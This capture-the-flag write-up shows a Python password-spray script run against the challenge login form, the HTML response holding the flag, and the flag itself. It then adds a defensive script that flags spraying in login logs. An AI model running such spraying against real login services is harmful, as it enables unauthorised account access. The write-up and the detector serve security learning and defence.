Tags: web 

I share the Python script that I've used to identify the user with valid credentials for the given site (http://www.jerseyctf.online) and to obtain the challenge's flag.

# ***Code***
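```
import sys

import requests

s_target = "http://www.jerseyctf.online"
b_text = b"Invalid"  # marker present in the response to a failed login
s_given_pwd = 'lightswitchon_and_offLOL26'  # the given password, tried with every username


def exploit(s_username, s_password):
    # Submit the login form with one username/password pair
    params = {'username': s_username, 'password': s_password, 'submit': 'Login'}
    r = requests.post(s_target, data=params)
    # No "Invalid" marker in the body means the login was accepted
    if b_text not in r.content:
        print("The right user is: ", s_username)
        print(s_username, r.text)
        sys.exit(0)


def main():
    # users.txt holds one candidate username per line
    with open("users.txt", "r") as f:
        l_users = [w.strip() for w in f]
    for s_payload in l_users:
        exploit(s_payload, s_given_pwd)


if __name__ == '__main__':
    main()
```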


# **Results**
```
The right user is: Wolverine

<html lang="en">

<head>
<meta charset="UTF-8">
<title>Login</title>
</head>

<body>
<h1>Login</h1>
<form action="" method="post">
<label>Username
<input type="text" name="username">
</label>


<label>Password
<input type="password" name="password">
</label>


<input type="submit" value="Login" name="submit">
</form>
Forgot Password?
<script>
alert("jctf{c0NGR@T2_y0U_p@22wORd_SPR@y3D!}");
</script>
</body>

</html>
```

# **Flag**

jctf{c0NGR@T2_y0U_p@22wORd_SPR@y3D!}
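
Seen from the login service's side, the spray above (one password tried once against every name in `users.txt`) is a single source touching many accounts only a few times each, which is what separates it from brute force against one account. The detector below is an added example, not part of the original writeup; the log format, IP addresses, usernames and thresholds are constructed assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample events in an assumed "time ip user result" format.
SAMPLE_LOG = """\
2024-01-01T10:00:01 203.0.113.7 alice FAIL
2024-01-01T10:00:02 203.0.113.7 bob FAIL
2024-01-01T10:00:03 203.0.113.7 carol FAIL
2024-01-01T10:00:04 203.0.113.7 dave OK
2024-01-01T10:01:00 198.51.100.4 alice FAIL
2024-01-01T10:01:05 198.51.100.4 alice FAIL
2024-01-01T10:01:09 198.51.100.4 alice FAIL
2024-01-01T10:30:00 192.0.2.9 frank FAIL
2024-01-01T10:30:20 192.0.2.9 frank OK
not a log line
"""

def parse(log_text):
    """Yield (timestamp, ip, user, ok) tuples, skipping malformed lines."""
    for line in log_text.splitlines():
        try:
            ts, ip, user, result = line.split()
            yield datetime.fromisoformat(ts), ip, user, result == "OK"
        except ValueError:
            continue

def detect_spray(log_text, window=timedelta(minutes=5), min_users=4, max_per_user=2):
    """Map each spraying source IP to (accounts tried, accounts that logged in)."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in parse(log_text):
        by_ip[ip].append((ts, user, ok))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Shrink the window until it spans at most `window` of time.
            while events[end][0] - events[start][0] > window:
                start += 1
            recent = events[start:end + 1]
            tries = Counter(user for _, user, _ in recent)
            # Many distinct accounts, few attempts each: spray, not brute force.
            if len(tries) >= min_users and max(tries.values()) <= max_per_user:
                flagged[ip] = (sorted(tries), sorted({u for _, u, ok in recent if ok}))
                break
    return flagged

if __name__ == "__main__":
    print(detect_spray(SAMPLE_LOG))
```

The second element of each result lists accounts that authenticated during the spray, which are the ones to lock and reset first.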